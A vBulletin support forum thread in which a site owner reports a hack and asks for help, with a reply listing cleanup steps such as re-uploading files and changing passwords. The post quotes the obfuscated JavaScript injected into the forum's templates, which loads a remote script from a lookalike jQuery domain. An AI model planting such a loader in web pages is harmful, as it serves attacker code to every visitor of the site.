Announcement

Collapse
No announcement yet.

My Vb4.1 was hacked !!! Please Help

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • icarusforde
    replied
    1. Re-upload all files in your root directory.
    2. Run this mod: http://www.vbulletin.org/forum/showthread.php?t=220967 (Yes, I know it's a 3.8 mod, but it works on 4.0)
    3. Change all passwords (FTP, Admin Accounts, cPanel, Database PW's, etc)
    4. Good luck.

    Leave a comment:


  • chithanh
    started a topic [Forum] My Vb4.1 was hacked !!! Please Help

    My Vb4.1 was hacked !!! Please Help

    Anyone please help me. Hacker add this scripts to my clientscript folder. Also they add to my style and templates. I don't know how they do it but I did change mod everything to 555 but they still add these code on my site.

    <script>var y ="jquery";var z = "plugins";var x ="http://";var t = ".org";var w = "jquery14";var u="script";document.write("<"+u+ " src=\""+ x + y + z + t + "/"+w+".js\""+">"+"</"+u+">");</script>


    Please help me, I am so tired. Anyone know where is style and templates store on server ? I need to change it permission.
widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
Working...
X